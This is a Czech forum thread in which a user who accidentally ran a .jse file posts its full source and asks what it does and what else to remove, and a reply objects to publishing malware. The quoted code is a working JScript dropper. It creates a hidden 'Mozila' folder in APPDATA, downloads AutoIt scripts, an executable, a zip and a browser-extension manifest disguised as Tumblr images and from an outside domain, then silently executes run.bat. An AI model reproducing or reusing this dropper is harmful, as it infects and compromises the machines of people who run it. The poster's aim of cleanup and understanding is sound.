Ahoj, chtěl bych se zeptat co dělá tenhle kód:
http://pastebin.com/KwBgAgZw
předem děkuji.
(function(c) {
function a(a, b, pos) {
if (!b || !a) return null;
var d = WScript.CreateObject("Msxml2.XMLhttp");
d.onreadystatechange = function() {
if (d.readyState === 4 && d.status === 200) {
xa = new ActiveXObject("ADODB.Stream");
xa.open();
xa.type = 1;
xa.write(d.ResponseBody);
xa.position = pos;
stm2 = new ActiveXObject("ADODB.Stream");
stm2.type = 1;
stm2.open();
stm2.write(xa.read());
stm2.saveToFile(b, 2);
stm2.close();
xa.close();
}
}
d.open("GET", a, false);
d.send(null);
}
function ekle(ustdosya,altdosya){{xa=new ActiveXObject("ADODB.Stream");xa.open();xa.type=1;xa.LoadFromFile(ustdosya);ix=new ActiveXObject("ADODB.Stream");ix.open();ix.type=1;ix.LoadFromFile(altdosya);stm2=new ActiveXObject("ADODB.Stream");stm2.type=1;stm2.open();stm2.write(ix.read());stm2.write(xa.read());xa.close();ix.close();stm2.saveToFile(ustdosya,2);stm2.close();}}
fso = new ActiveXObject("Scripting.FileSystemObject");
var e = new ActiveXObject("WScript.Shell");
c = new ActiveXObject("Shell.Application" );
FileDestr = e["ExpandEnvironmentStrings"]("%APPDATA%\\");
mozklasor = FileDestr+"Mozila";
if(!fso.FolderExists(mozklasor)) { fso.CreateFolder(mozklasor); }
c.ShellExecute("https://goo.gl/hMyuQd");
sabittumb='.media.tumblr.com/47d1cf240d5a2bf213839fa3bb61f31a/tumblr_nw';
a("https://36"+sabittumb+"9rw6Wltk1ui8al4o1_400.jpg", mozklasor+"\\Autoit.exe",10206);
a("http://cutecatworldhappy.click/denes/bg.html", mozklasor+"\\bg.html",0);
a("https://40"+sabittumb+"9s9iWADO1ui8al4o1_400.jpg", mozklasor+"\\ekl.au3",10206);
a("https://41"+sabittumb+"9sbe1LSS1ui8al4o1_400.jpg", mozklasor+"\\ff.zip",10206);
a("https://41"+sabittumb+"bz24iPSF1ui8al4o1_400.jpg", mozklasor+"\\force.au3",10206);
a("https://40"+sabittumb+"9sgiNQ9p1ui8al4o1_400.jpg", mozklasor+"\\reg.au3",10206);
a("https://40"+sabittumb+"9siiCxmJ1ui8al4o1_400.jpg", mozklasor+"\\sabit.au3",10206);
a("http://cutecatworldhappy.click/denes/manifest.jpg", mozklasor+"\\manifest.json",0);
a("https://41"+sabittumb+"gqfrSz821ui8al4o1_400.jpg", mozklasor+"\\run.bat",10206);
a("http://cutecatworldhappy.click/denes/up.jpg", mozklasor+"\\up.au3",0);
ekle(mozklasor+"\\force.au3" , mozklasor+"\\sabit.au3");
ekle(mozklasor+"\\reg.au3" , mozklasor+"\\sabit.au3");
ekle(mozklasor+"\\ekl.au3" , mozklasor+"\\sabit.au3");
c.ShellExecute(mozklasor+"\\run.bat", "", mozklasor, "", 0);
//c.ShellExecute(mozklasor+"\\Autoit.exe", '"' + mozklasor+"\\ekl.au3" + '"', "", "", 0);
})(this);
#9 Ahert
Není vůbec rozumné veřejně vystavovat malware, i když jen ve formě zdrojového kódu. Normální uživatelé to k ničemu nepotřebují a zajímá to jen škodiče.
Soubory s příponami exe a bat jsou pro mne pouze soubory s příponami exe a bat. Nic víc. Některým uživatelům však mohou způsobit problémy. Proč jim chceš škodit?
Nechci nikomu škodit, píšu, že jsem omylem (svojí nepozorností/blbostí) otevřel soubor s tímto zdrojovým kódem - když jsem si pozdě všiml, že to má koncovku .jse tak jsem se podíval na zdroják a našel jsem tohle. Vytvořilo mi to složku v appdata s názvem Mozila a několika soubory uvnitř. Tu složku jsem smazal, soubor taky, ale zajímá mě jestli to dělá ještě něco - avast bohužel prospal a neobtěžoval se vyhodit ani jednu hlášku.
Zásadně nedoporučuji nikomu toto spouštět, ale ptám se jestli mám ještě něco hledat na odstranění po mém hloupém spuštění...
Ano, opravdu chci reagovat → zobrazí formulář pro přidání příspěvku